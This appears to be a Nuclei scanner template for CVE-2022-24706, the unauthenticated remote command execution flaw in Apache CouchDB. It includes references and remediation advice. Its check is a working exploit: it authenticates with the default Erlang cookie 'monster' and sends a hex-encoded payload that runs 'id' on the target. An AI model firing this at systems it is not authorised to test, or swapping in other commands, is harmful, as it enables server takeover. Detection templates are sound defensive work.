id: CVE-2022-24706 info: name: CouchDB Erlang Distribution - Remote Command Execution author: Mzack9999,pussycat0x severity: critical description: | In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges. reference: - https://www.exploit-db.com/exploits/50914 - https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit/blob/main/CVE-2022-24706-Exploit.py - https://nvd.nist.gov/vuln/detail/CVE-2022-24706 - http://www.openwall.com/lists/oss-security/2022/04/26/1 - http://www.openwall.com/lists/oss-security/2022/05/09/1 remediation: | Upgrade to versions 3.2.2 or newer. Starting from CouchDB 3.2.2, the previous default Erlang cookie value "monster" will be rejected upon startup. Upgraded installations will be required to select an alternative value. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-24706 cwe-id: CWE-1188 cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:* epss-score: 0.97407 metadata: max-request: 1 product: couchdb shodan-query: product:"CouchDB" vendor: apache verified: "true" tags: cve,cve2022,network,couch,rce,kev variables: name_msg: "00156e00050007499c4141414141414041414141414141" challenge_reply: "00157201020304" cookie: "monster" cmd: "0000006670836804610667770e41414141414140414141414141410000000300000000007700770372657883680267770e41414141414140414141414141410000000300000000006805770463616c6c77026f737703636d646c000000016b000269646a770475736572" tcp: - host: - "{{Hostname}}" port: 9100 inputs: # auth - data: "{{name_msg}}" type: hex read: 1024 - read: 1024 name: challenge - data: "{{challenge_reply+md5(cookie + to_string(unpack('>I',substr(challenge, 9, 13))))}}" type: hex # rce - data: "{{cmd}}" type: hex read: 1024 matchers: - type: word part: raw words: - "uid" - "gid" - "groups" condition: and